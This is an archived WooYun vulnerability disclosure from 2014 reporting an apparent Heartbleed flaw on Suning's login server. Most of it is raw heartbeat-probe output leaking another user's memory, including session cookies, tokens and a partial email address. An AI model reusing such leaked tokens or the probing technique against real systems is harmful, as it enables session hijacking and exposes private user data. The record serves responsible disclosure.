乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-04-08: 细节已通知厂商并且等待厂商处理中 2014-04-09: 厂商已经确认,细节仅向厂商公开 2014-04-19: 细节向核心白帽子及相关领域专家公开 2014-04-29: 细节向普通白帽子公开 2014-05-09: 细节向实习白帽子公开 2014-05-23: 细节向公众公开
苏宁易购主站运维不当导致可以登录随机用户并且获取服务器敏感信息
https://passport.suning.com
Connecting...Sending Client Hello...Waiting for Server Hello... ... received message: type = 22, ver = 0302, length = 58 ... received message: type = 22, ver = 0302, length = 3559 ... received message: type = 22, ver = 0302, length = 4Sending heartbeat request... ... received message: type = 24, ver = 0302, length = 16384Received heartbeat response: [email protected][...r....+..H...9........w.3....f.....".!.9.8.........5. ............................3.2.....E.D...../...A............... ..................I...........4.2............................... ....................#.......31 (KHTML, like Gecko));dv(ZP900S Bu ild/IMM76D);pr(UCBrowser/9.3.0.321);ov(Android 4.0.4);pi(540*960 );ss(540*960);up(U3/0.8.0);er(U);bt(UM);pm(1);bv(1);nm(0);im(0); sr(0);nt(1);..Referer: https://m.suning.com/emall/SNMWLogonView? catalogId=10051&storeId=10052&krypto=jH%2BX7iif8nPNG7HOz2SMdJVSD hxbo7s2BHmi3q0tE2x61VDNMf05R%2BxZlUW9orIhD7h%2F%2BzVGOV5a%0Ap6B9 Oum0psvB3jQ6jFoOihj5p15IfGcSRafMfcisA09gvSpkbUK4LgdQXrFwRbKzgPp8 xl0S0y1C%0AJHkOLl7%2FYQo2BNW2UjhOrWWUeuGuYM74jazmYQE%2BlBaamCJV2 vC67gkPLSkQ0WYa1uOEqHKE3mpk%0AHnHst9dbcLWfe06OEInJoHNpDeV1lRB772 d9pC02KvEV9550T6O%2FKjM7%2B4HV%2BTlJZOP%2BjbAHr6Jh%0AS%2ByeAhNU% 2BKKyeShSYwaERB5MqkoCIHrnsaOSd78owxqsUpWEsXzK5982IkCvrC3zFre2TGR LSZHb%0ApAxpdb%2Bogio15cNE3SxbzFsCQNf3mi34SUEn%2BG0O7OdoBUShBxrx dzme5pf%2BgoSSiLgcTtuqBcbA%0AlFxiGHubpcL%2BzCngI8dCUGMLFgOFfJUT% 2BYpHgdTY8a62BdOy4HwiQAV3tNI4H6G42uQ%3D&ddkey=https:Logon..Accep t-Encoding: gzip..User-Agent: Mozilla/5.0 (Linux; U; Android 4.0 .4; zh-CN; ZP900S Build/IMM76D) AppleWebKit/534.31 (KHTML, like Gecko) UCBrowser/9.3.0.321 U3/0.8.0 Mobile Safari/534.31..isAjax Request: 1..Accept: application/json, text/javascript, */*; q=0. 01..Connection: keep-alive.......~.AHC-..,....ning.com/emall/SNM WLogonView%3FcatalogId%3D10051%26storeId%3D10052%26krypto%3DjH%2 52BX7iif8nPNG7HOz2SMdJVSDhxbo7s2BHmi3q0tE2x61VDNMf05R%252BxZlUW9 orIhD7h%252F%252BzVGOV5a%250Ap6B9Oum0psvB3jQ6jFoOihj5p15IfGcSRaf MfcisA09gvSpkbUK4LgdQXrFwRbKzgPp8xl0S0y1C%250AJHkOLl7%252FYQo2BN W2UjhOrWWUeuGuYM74jazmYQE%252BlBaamCJV2vC67gkPLSkQ0WYa1uOEqHKE3m pk%250AHnHst9dbcLWfe06OEInJoHNpDeV1lRB772d9pC02KvEV9550T6O%252FK jM7%252B4HV%252BTlJZOP%252BjbAHr6Jh%250AS%252ByeAhNU%252BKKyeShS YwaERB5MqkoCIHrnsaOSd78owxqsUpWEsXzK5982IkCvrC3zFre2TGRLSZHb%250 ApAxpdb%252Bogio15cNE3SxbzFsCQNf3mi34SUEnLLGK97g%252BKGYpqrD2QkR bSaYosuUiD%252FYvwmMJiWRC%250A7gGZ7GqLr9KVOV7wMMGx51tIEIovTOObvp V^m..+.'..F....*2C822%29%28233%2C973%29%28undefined%2Cundefined% 29%280%2C0%29%28undefined%2Cundefined%29%280%2C0%29%28undefined% 2Cundefined%29%280%2C0%29%28286%2C1016%29%28622%2C846%29; WC_USE RACTIVITY_42167480840=42167480840%2c10052%2c0%2cnull%2c139695011 3713%2c1396957929635%2cnull%2cnull%2cnull%2cnull%2cRwQIfr6JwV58J U6yvO9k5VLVYXVEuc%2bDmq5Fjc6K3VNMTn4%2fRjISR3kC%2bfnhC6kvBMLxv2L dyZMc%0a4AR5IZgNeu%2b772rZlI%2f8sS4aCIiRurJTKJO761Zh63w9aqmp%2fM AkX7Hc%2b2SrdlEjnlrR2wkdwhEg%0a6hgeXCHr5DT6qcVCBIKY8yw2cb09jQ%3d %3d.....gh..:...W...1m..jj......est=a; abtestN=c; firstAccess=ye s; smhst=4352764a16812901a3965144a18803215a16812905; _snma=1%7C1 38958281362275702%7C1389582813622%7C1396940751976%7C139694077367 1%7C548%7C173; _snmp=139694075285671452; _snmb=13969400395312338 4%7C1396940773687%7C1396940773680%7C16; __utma=1.1600380945.1389 582814.1396927805.1396940040.150; __utmc=1; __utmz=1.1396940040. 150.93.utmcsr=product.suning.com|utmccn=(referral)|utmcmd=referr al|utmcct=/snupgbpv_10052_10051_18802726_113110_.html; __utmv=1. buyer; _snmz=139694077851029170%7C%28505%2C1127%29; idsLoginUser IdLastTime=10823559%40qq.com; theme=default.......D5.....v!..>Nr sZtgqrHGojMLb2gOJuZwZRz8A%3d%3d...../..*.....EG.b...............
升级
危害等级:低
漏洞Rank:3
确认时间:2014-04-09 09:17
已经确认
暂无
